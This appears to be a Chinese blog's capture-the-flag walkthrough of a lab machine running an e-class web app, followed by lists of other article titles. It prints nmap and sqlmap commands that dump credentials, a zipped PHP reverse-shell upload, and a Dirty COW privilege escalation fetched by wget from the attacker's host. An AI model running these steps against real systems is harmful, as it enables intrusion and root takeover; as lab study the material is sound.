kali：192.168.111.111

靶机：192.168.111.192

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.192

owasp-zap爬虫发现目录

漏洞利用

登录点存在sql注入，burp抓包保存成txt，用sqlmap利用，获得账号密码：admin|ilikecats89

sqlmap -o -r ./a.txt --batch --level 5 --risk 3 -D 'eclass' -T 'user' -C 'username,password' --dump

/vulnuni-eclass/modules/course_info/restore_course.php可以上传文件

把反弹shell的php脚本压缩成zip格式上传，上传后会自动解压到/vulnuni-eclass/courses/tmpUnzipping

提权

内核版本

dirtycow提权

searchsploit -p 40616

python开启http服务

python3 -m http.server

靶机下载

wget http://192.168.111.111:8000/40616.c

40616.c使用方法

gcc 40616.c -o exp -pthread

./exp

获得flag

最新文章

1. Map工具系列-08-map控件查看器
2. Event Store 2.0发布，带来了安全支持和测试版Projections库
3. 在Linux下进行磁盘分区
4. UINavigationController 与 UITabBarController
5. SendMessage API
6. [Immutable.js] Differences between the Immutable.js Map() and List()
7. linux命令:scp
8. hdu 3397 线段树双标记
9. vue 增删改查
10. spring中使用@PostConstruct和@PreConstruct注解
11. python学习之-软件开发的目录规范
12. RegExp.$1 简单理解
13. iconfont 在项目中的简单使用
14. Docker入门命令备份
15. scrapy框架解读--深入理解爬虫原理
16. Refactoring之——代码的坏味道（四）过长参数列
17. 《Cracking the Coding Interview》——第18章：难题——题目7
18. 关于audio.js的研究
19. Myeclipse项目内容没有报错但是项目上面却有红色叉叉
20. dwarf调试信息格式入门

热门文章

1. day05-功能实现04
2. 基于.NetCore开发博客项目 StarBlog - (24) 统一接口数据返回格式
3. Vue element 自定义表单验证(验证手机号)
4. 使用idea进行gitee代码管理
5. C#开发的线程池和管理器 - 开源研究系列文章
6. python连接kafka-2.0
7. Ubuntu desktop 文件的书写格式
8. 精华推荐 | 【JVM深层系列】「GC底层调优系列」一文带你彻底加强夯实底层原理之GC垃圾回收技术的分析指南（GC原理透析）
9. AJAX容易出错地方，错误处理
10. djiango路由匹配、djiango路由层、反向解析、有名无名反向解析